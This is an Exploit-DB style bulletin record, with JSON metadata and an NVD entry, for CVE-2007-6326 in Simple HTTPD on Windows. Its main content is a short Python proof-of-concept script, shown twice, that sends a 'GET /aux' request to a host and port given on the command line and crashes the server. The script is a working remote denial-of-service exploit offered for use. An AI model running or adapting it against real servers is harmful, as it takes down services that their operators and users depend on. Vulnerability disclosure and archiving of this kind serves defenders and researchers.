ID EDB-ID:4717Type exploitdbReporter shinnaiModified 2007-12-11T00:00:00
Description
Simple HTTPD <= 1.41 (/aux) Remote Denial of Service Exploit. CVE-2007-6326. Dos exploit for windows platform
#usage: poc.py host port
import socket
import sys
print "-----------------------------------------------------------------------"
print "Simple HTTPD 1.3 /aux Denial of Service\n"
print "url: http://shttpd.sourceforge.net\n"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "-----------------------------------------------------------------------"
host = sys.argv[1]
port = long(sys.argv[2])
try:
request = "GET /aux HTTP/1.1\n\n"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
except:
print "Unable to connect. exiting."
# milw0rm.com [2007-12-11]
{"id": "EDB-ID:4717", "hash": "45dc8a3a4844e2ff85484e20eae13c2a", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Simple HTTPD <= 1.41 /aux Remote Denial of Service Exploit", "description": "Simple HTTPD <= 1.41 (/aux) Remote Denial of Service Exploit. CVE-2007-6326. Dos exploit for windows platform", "published": "2007-12-11T00:00:00", "modified": "2007-12-11T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4717/", "reporter": "shinnai", "references": [], "cvelist": ["CVE-2007-6326"], "lastseen": "2016-01-31T21:36:24", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.5, "vector": "NONE", "modified": "2016-01-31T21:36:24"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-6326"]}], "modified": "2016-01-31T21:36:24"}, "vulnersScore": 5.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4717/", "sourceData": "#usage: poc.py host port\n\nimport socket\nimport sys\n\nprint \"-----------------------------------------------------------------------\"\nprint \"Simple HTTPD 1.3 /aux Denial of Service\\n\"\nprint \"url: http://shttpd.sourceforge.net\\n\"\nprint \"author: shinnai\"\nprint \"mail: shinnai[at]autistici[dot]org\"\nprint \"site: http://shinnai.altervista.org\"\nprint \"-----------------------------------------------------------------------\"\n\nhost = sys.argv[1]\nport = long(sys.argv[2])\n\ntry:\n request = \"GET /aux HTTP/1.1\\n\\n\"\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n connection.connect((host, port))\n connection.send(request)\nexcept:\n print \"Unable to connect. exiting.\"\n\n# milw0rm.com [2007-12-11]\n", "osvdbidlist": ["43660"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:02", "bulletinFamily": "NVD", "description": "Sergey Lyubka Simple HTTPD (shttpd) 1.3 on Windows allows remote attackers to cause a denial of service via a request that includes an MS-DOS device name, as demonstrated by the /aux URI.", "modified": "2017-09-29T01:29:00", "id": "CVE-2007-6326", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6326", "published": "2007-12-13T19:46:00", "title": "CVE-2007-6326", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}
